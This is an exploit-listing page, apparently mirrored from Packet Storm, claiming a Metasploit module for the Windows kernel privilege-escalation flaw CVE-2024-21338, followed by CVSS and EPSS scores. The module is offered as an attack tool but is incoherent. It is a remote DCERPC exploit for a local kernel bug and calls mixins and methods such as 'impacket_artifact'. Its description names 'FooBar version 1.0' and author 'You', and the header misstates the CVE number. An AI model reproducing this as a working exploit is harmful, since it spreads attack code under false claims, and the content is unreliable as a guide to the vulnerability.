Microsoft Windows 10.0.17763.5458 Privilege Escalation

🗓️ 02 Apr 2024 00:00:00Reported by E1.CodersType

packetstorm🔗 packetstormsecurity.com👁 388 Views

Microsoft Windows Kernel Exposed IOCTL Privilege Escalation CVE-2024-2133

Reporter	Title	Published	Views	Family All 53
0day.today	Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Exploit	2 Apr 202400:00	–	zdt
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	11 Mar 202611:44	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	29 Jul 202413:18	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	23 Jun 202406:03	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	13 Apr 202405:53	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	17 Apr 202410:16	–	githubexploit
ATTACKERKB	CVE-2024-21338	13 Feb 202400:00	–	attackerkb
Information Security Automation	February 2024: Vulremi, Vuldetta, PT VM Course relaunch, PT TrendVulns digests, Ivanti, Fortinet, MSPT, Linux PW	5 Mar 202418:43	–	avleonov
Circl	CVE-2024-21338	13 Feb 202420:06	–	circl
CISA KEV Catalog	Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability	4 Mar 202400:00	–	cisa_kev

`#############################################  
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #  
#  
# This module requires Metasploit: https://metasploit.com/download  
#  
# Author : E1.Coders #  
# #  
# Contact : E1.Coders [at] Mail [dot] RU #  
# #  
# Security Risk : High #  
# #  
# #  
#############################################  
  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::DCERPC  
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'CVE-2024-21338 Exploit',  
'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',  
'Author' => 'You',  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2024-21338']  
]  
)  
)  
  
register_options(  
[  
OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),  
OptPort.new('RPORT', [true, 'The target port', 1234])  
]  
)  
end  
  
def check  
connect  
  
begin  
impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')  
rescue Rex::Post::Meterpreter::RequestError  
return Exploit::CheckCode::Safe  
end  
  
Exploit::CheckCode::Appears  
end  
  
def exploit  
connect  
  
begin  
impacket_artifact(  
dcerpc_binding('ncacn_ip_tcp'),  
'FooBar',  
datastore['FooBarPayload']  
)  
rescue Rex::Post::Meterpreter::RequestError  
fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'  
end  
  
handler  
disconnect  
end  
end  
  
  
#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338  
  
`

02 Apr 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 3.17.8

EPSS0.78644